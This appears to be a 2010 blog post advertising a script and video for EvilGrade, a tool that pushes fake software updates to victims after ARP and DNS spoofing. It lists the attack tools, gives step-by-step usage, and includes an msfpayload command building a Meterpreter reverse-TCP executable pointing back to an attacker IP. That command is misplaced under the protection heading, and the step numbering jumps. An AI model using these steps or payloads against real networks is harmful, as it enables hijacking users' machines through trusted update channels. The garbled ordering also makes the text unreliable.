Watch video on-line: http://g0tmi1k.blip.tv/file/3629001
Download video: http://www.mediafire.com/?m55c5k5c7pf633f
Script (evilGrade[v0.1.3].sh): evilGrade[v0.1.3].sh
Script (evilGrade_install[v0.1.3].sh): http://www.mediafire.com/?xjoghumzimy
What is this?
EvilGrade: "ISR-evilgrade: is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates."
Metasploit: "Evilgrade Will Destroy Us All."
This is a "semi automate" script to help set-up an environment for EvilGrade so it can work its magic, and then there is a video demonstrating it in action which shows the effects of EvilGrade. EvilGrade is simply, another "option" to do after performing a "Man In The Middle" attack, that tricks certain software to believe there is an update available when really it's the attacker payload.
How does this work?
EvilGrade: "It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems.Evilgrade needs the manipulation of the victim dns traffic."
EvilGrade creates a web server, which when a program's auto-update feature queries back "home" to check for an update, EvilGrade creates a spoofed updated version. The program then notify the target that there is an "update" available, and would they like to update. The danger of this is most users trust the program with the "auto update feature" and download and executes the update, when in reality, this is our payload.
What do I need?
> EvilGrade + Any Requirements (Data:ump, Digest::MD5, Time::HiRes)
> A Payload (I'm using metasploit and SBD)
> A method of doing a MITM Attack (I'm using arpspoof - part of dsniff suite)
> A way to spoof DNS (I'm using dnsspoof - part of dsniff suite)
> evilGrade[v0.1.3].sh (only if you wish for a helping hand to automate a few steps)
> evilGrade_install[v0.1.3].sh (only if you wish for a helping hand to get this working with BackTrack 4 Final)
How to use it?1.)Download the script(s)
2.) Install EvilGrade. (If your lazy use the script!)
3.)Check to see what interface is going to be used. (via ifconfig)
4.) Edit evilGrade[v0.1.3].sh (via kate evilGrade\[v0.1.3\].sh) to make it work with your system
5.) bash evilGrade\[v0.1.3\].sh OR bash evilGrade\[v0.1.3].sh TargetsIP (bash evilGrade\[v0.1.3\].sh 192.168.1.101)
6.) Pick your which software to attack. (via show modules)
7.) Pick your "agent" (Which program to insert/inject/replace the update)
8.) Check any other options (via show options)
11.) ...Game Over.
How can I protect myself from this?
set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.103 X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>"]'
> Don't use the self updating features on software.
> When prompted about an update, visit the official homepage to download the update.
> Check the official homepage for a MD5/SHA1 hash.
The video uses evilGrade[v0.1].sh
It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.
Song: Public Domain - Operation Blade
Video length: 2:44
Capture length: 7:59
Blog Post: http://g0tmi1k.blogspot.com/2010/05/script-video-evilgrade-v011.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/28425-%5Bscript%5D%5Bvideo%5D-evilgrade-v0-1-1-a.html#post162025
v0.1.3 + Checks for superuser
+ Added arguments
+ Checks interfaces/paths/files exists
> Fix it - Couple of silly typos
> General code improvements
> Improved checking the targets IP Address
+ Added debug mode
+ Added custom payload
+ Checks system setup before running
+ Fix gateway bug
> General code improvements
+ First public release